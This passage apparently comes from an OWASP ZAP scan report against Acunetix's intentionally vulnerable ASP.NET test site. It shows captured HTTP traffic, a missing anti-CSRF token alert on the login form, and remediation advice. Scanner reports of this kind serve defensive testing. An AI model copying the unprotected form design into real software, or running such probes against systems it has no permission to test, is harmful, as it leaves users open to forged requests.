          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        18. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in an HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnLogin" "cbPersistCookie" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          Solution

          Phase: Architecture and Design

